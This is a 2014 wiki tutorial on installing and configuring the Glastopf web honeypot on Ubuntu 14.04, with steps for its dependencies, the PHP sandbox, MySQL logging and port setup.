Installing Glastopf web honeypot on Ubuntu Server 14.04

From Zam Wiki
Revision as of 15:20, 3 November 2014 by Zam (talk | contribs) (Install and configure the PHP sandbox)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

Prerequisites

Install the dependencies

apt-get update
apt-get install python2.7 python-openssl python-gevent libevent-dev python2.7-dev build-essential make liblapack-dev libmysqlclient-dev python-chardet python-requests python-sqlalchemy python-lxml python-beautifulsoup mongodb python-pip python-dev python-numpy python-setuptools python-numpy-dev python-scipy libatlas-dev g++ git php5 php5-dev gfortran mysql-server python-mysqldb libxml2 libxslt-dev libffi-dev -y
pip install --upgrade distribute
pip install --upgrade gevent webob pyopenssl chardet lxml sqlalchemy jinja2 beautifulsoup requests requires cssselect pymongo MySQL-python pylibinjection libtaxii greenlet

Install HpFeeds

cd /opt
git clone https://github.com/rep/hpfeeds.git
cd hpfeeds
python setup.py build
python setup.py install

Install and configure the PHP sandbox

Download using git:

cd /opt
git clone git://github.com/glastopf/BFR.git
cd BFR
sudo phpize
sudo ./configure --enable-bfr
sudo make
sudo make install

Open the php.ini file and add bfr.so accordingly to the build output:

zend_extension = /usr/lib/php5/20121212/bfr.so

Download glastopf source code from git

cd /opt
sudo git clone https://github.com/glastopf/glastopf.git

Install Pylinjection

cd /opt
git clone --recursive https://github.com/glastopf/pylibinjection.git
rm /opt/pylibinjection/src/pylibinjection.c
cd pylibinjection/
python setup.py build
python setup.py install

Install distribute manually

sudo rm -rf /usr/local/lib/python2.7/dist-packages/distribute-0.7.3-py2.7.egg-info/
sudo rm -rf /usr/local/lib/python2.7/dist-packages/setuptools*
cd /opt
sudo wget https://pypi.python.org/packages/source/d/distribute/distribute-0.6.35.tar.gz
sudo tar -xzvf distribute-0.6.35.tar.gz
cd distribute-0.6.35
sudo python setup.py build
sudo python setup.py install 

Install glastopf

cd /opt/glastopf
sudo python setup.py build
sudo python setup.py install

Configuration

Prepare glastopf environment:

cd /opt
sudo mkdir glaspot
cd glaspot
sudo glastopf-runner

A new default glastopf.cfg has been created in glastopf, which can be customized as required.

Testing the Honeypot

Start Glastopf (from your 'myhoneypot' directory):

sudo glastopf-runner

Use your web browser to visit your honeypot. You should see the following output on your command line:

2013-05-21 08:34:08,129 (glastopf.glastopf) Initializing Glastopf using "/opt/myhoneypot" as work directory.
2013-05-21 08:34:08,130 (glastopf.glastopf) Connecting to main database with: sqlite:///db/glastopf.db
2013-05-21 08:34:08,152 (glastopf.modules.reporting.auxiliary.log_hpfeeds) Connecting to feed broker.
2013-05-21 08:34:08,227 (glastopf.modules.reporting.auxiliary.log_hpfeeds) Connected to hpfeed broker.
2013-05-21 08:34:11,265 (glastopf.glastopf) Glastopf started and privileges dropped.

Advance

Google Index

As described above, we can "advertise" our glastopf "weaknesses" to Google (for Google Dorks). So that attackers are aware of your honeypot, you must include your web server in the Google index.

Enter the glastopf URL to [Google Webmaster Tools] to register your web site for Google bot crawl. Now, just sit back and wait for the first attacks shows...

Log to MySQL

If you prefer a MySQL database instead of SQLite, install a MySQL server:

sudo apt-get install mysql-server python-mysqldb

Then create new db & user with its privileges:

mysql -u root -p

mysql> create database glaspot;
Query OK, 1 row affected (0.00 sec)

mysql> create user 'glaspot'@'localhost' identified by 'glaspot';
Query OK, 0 rows affected (0.00 sec)

mysql> grant all privileges on glaspot.* to 'glaspot'@'localhost';
Query OK, 0 rows affected (0.00 sec)

mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)

mysql> exit
Bye

During the installation of the system and the user account you are prompted for a password. Make sure you use a strong password, because the database is in an open network.

Configure glastopf.conf file

We need to configure the glastopf.conf file that located at /opt/glastopf. Inside this file, there are many setting that you can change accordingly.

  • First, we change our glastopf to run at port 80 instead of port 8080:

Beware: Please ensure you not running apache service at port 80. Bind it to another port.

[webserver]
host = 0.0.0.0
port = 80
uid = nobody
gid = nogroup
proxy_enabled = False

We do this to make our honeypot to look like real web app.

  • Change the database option to log to mysql instead to sqlite:
[main-database]
#If disabled a sqlite database will be created (db/glastopf.db)
#to be used as dork storage.
enabled = True
#mongodb or sqlalchemy connection string, ex:
#mongodb://localhost:27017/glastopf
#mongodb://james:[email protected]:27017/glastopf
#mysql://james:[email protected]/glastopf
#connection_string = sqlite:///db/glastopf.db
connection_string = mysql://glaspot:[email protected]/glaspot

Fire Up!

  • Start your glastopf by run this command on your terminal:
cd /opt/glastopf/
python /usr/local/bin/glastopf-runner

If you want to run glastopf at background, run with this argument:

cd /opt/glastopf/
python /usr/local/bin/glastopf-runner &
disown

Troubleshooting

  • If you get this kind of error:
fatal error: libinjection.h: No such file or directory

during the glastopf installation, please do this:

sudo git clone --recursive https://github.com/glastopf/pylibinjection.git
sudo rm /opt/pylibinjection/src/pylibinjection.c
cd pylibinjection/
sudo python setup.py build
sudo python setup.py install

Then try to run the glastopf setup again.

blog comments powered by Disqus